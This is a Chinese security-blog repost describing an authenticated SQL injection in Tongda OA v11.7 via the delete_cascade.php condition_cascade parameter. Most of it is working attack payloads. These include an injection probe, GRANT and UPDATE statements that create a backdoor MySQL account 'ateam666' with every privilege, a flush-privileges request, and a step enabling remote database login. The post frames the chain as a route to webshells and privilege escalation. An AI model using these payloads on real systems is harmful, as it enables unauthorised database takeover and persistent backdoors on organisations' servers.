通达OA v11.7 后台SQL注入

admin 2022年1月6日01:04:48安全博客评论25 views2091字阅读6分58秒阅读模式

利用条件

需要登录权限

原文作者给出了利用链注入加mysql权限,又是写木马的。用起来很舒服

1
/general/hr/manage/query/delete_cascade.php?condition_cascade=select%20if((substr(user(),1,1)=%27r%27),1,power(9999,99))

1、添加一个mysql用户

1
grant all privileges ON mysql.* TO 'ateam666'@'%' IDENTIFIED BY '[email protected]' WITH GRANT OPTION

image-20200917165121752

2、给创建的ateam666账户添加mysql权限。

1
UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('ateam666' AS Binary(5));

3、刷新数据库就可以登录到数据库啦。

1
/general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;

4、通达OA配置mysql默认是不开启外网访问的所以需要修改mysql授权登录。

1
2
3
/general/hr/manage/query/delete_cascade.php?condition_cascade=

grant all privileges ON mysql.* TO 'ateam666'@'%' IDENTIFIED BY '[email protected]' WITH GRANT OPTION

5、接下来就是考验mysql提权功底的时候啦

参考链接:https://mp.weixin.qq.com/s/8rvIT1y_odN2obJ1yAvLbw

FROM :ol4three.com | Author:ol4three

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:04:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  通达OA v11.7 后台SQL注入 http://cn-sec.com/archives/720953.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: